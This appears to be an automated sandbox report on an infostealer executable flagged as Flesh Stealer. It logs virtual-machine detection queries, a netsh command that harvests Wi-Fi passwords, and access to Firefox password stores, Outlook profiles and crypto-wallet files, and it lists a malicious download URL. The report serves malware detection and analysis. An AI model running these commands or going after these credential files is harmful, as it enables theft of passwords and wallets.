    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_PnPEntity
    Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: 1605EA70000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: 16076D30000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599875Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599766Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599657Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599532Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599407Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599282Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599157Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599047Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598938Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598813Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598688Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598438Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWindow / User API: threadDelayed 9865Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -600000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599875s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599766s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599657s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599532s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599407s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599282s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599157s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -599047s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -598938s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -598813s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -598688s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -598563s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216Thread sleep time: -598438s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599875Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599766Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599657Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599532Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599407Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599282Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599157Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 599047Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598938Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598813Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598688Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeThread delayed: delay time: 598438Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605D000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure DriverSystemEnableMicrosoft Hyper-V Virtualization Infrastructure Driver
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Managerp^
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp^
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Users\user\Desktop\iGxCM2I5u9.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Flesh Stealer
    Source: Yara matchFile source: Process Memory Space: iGxCM2I5u9.exe PID: 7544, type: MEMORYSTR
    Found many strings related to Crypto-Wallets (likely being stolen)
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data Electrum
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Google Jaxx
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data ExodusWeb3
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
    Tries to harvest and steal WLAN passwords
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

    Remote Access Functionality

    barindex
    Yara detected Flesh Stealer
    Source: Yara matchFile source: Process Memory Space: iGxCM2I5u9.exe PID: 7544, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts331
    Windows Management Instrumentation    		1
    DLL Side-Loading    		12
    Process Injection    		11
    Disable or Modify Tools    		1
    OS Credential Dumping    		421
    Security Software Discovery    		Remote Services1
    Email Collection    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		351
    Virtualization/Sandbox Evasion    		LSASS Memory2
    Process Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		1
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
    Process Injection    		Security Account Manager351
    Virtualization/Sandbox Evasion    		SMB/Windows Admin Shares2
    Data from Local System    		3
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Timestomp    		LSA Secrets1
    System Network Configuration Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync144
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569093 Sample: iGxCM2I5u9.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 23 orange-loris-425181.hostingersite.com 2->23 25 icanhazip.com 2->25 27 2 other IPs or domains 2->27 35 Antivirus detection for URL or domain 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 Sigma detected: Capture Wi-Fi password 2->39 41 4 other signatures 2->41 8 iGxCM2I5u9.exe 14 7 2->8         started        signatures3 process4 dnsIp5 29 89.23.100.233, 32089, 49758, 49759 MAXITEL-ASRU Russian Federation 8->29 31 free.cdn.hstgr.net 84.32.84.100, 443, 49756 NTT-LT-ASLT Lithuania 8->31 33 icanhazip.com 104.16.185.241, 49757, 80 CLOUDFLARENETUS United States 8->33 43 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->43 45 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 8->45 47 Tries to steal Mail credentials (via file / registry access) 8->47 49 5 other signatures 8->49 12 cmd.exe 1 8->12         started        signatures6 process7 signatures8 51 Uses netsh to modify the Windows network and firewall settings 12->51 53 Tries to harvest and steal WLAN passwords 12->53 15 netsh.exe 2 12->15         started        17 conhost.exe 12->17         started        19 findstr.exe 1 12->19         started        21 chcp.com 1 12->21         started        process9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    iGxCM2I5u9.exe100%AviraTR/Spy.Agent.ksybx
    iGxCM2I5u9.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
    iGxCM2I5u9.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
    http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
    https://orange-loris-425181.hostingersite.com0%Avira URL Cloudsafe
    https://orange-loris-425181.hostingersite.com/uploads/clean.exe100%Avira URL Cloudmalware
    http://www.quovadis.bm00%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    free.cdn.hstgr.net
    		84.32.84.100
    		truefalse
      		high
      icanhazip.com
      		104.16.185.241
      		truefalse
        		high
        orange-loris-425181.hostingersite.com
        		unknown
        		unknownfalse
          		unknown
          69.170.12.0.in-addr.arpa
          		unknown
          		unknownfalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://icanhazip.com/false
              		high
              https://orange-loris-425181.hostingersite.com/uploads/clean.exefalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
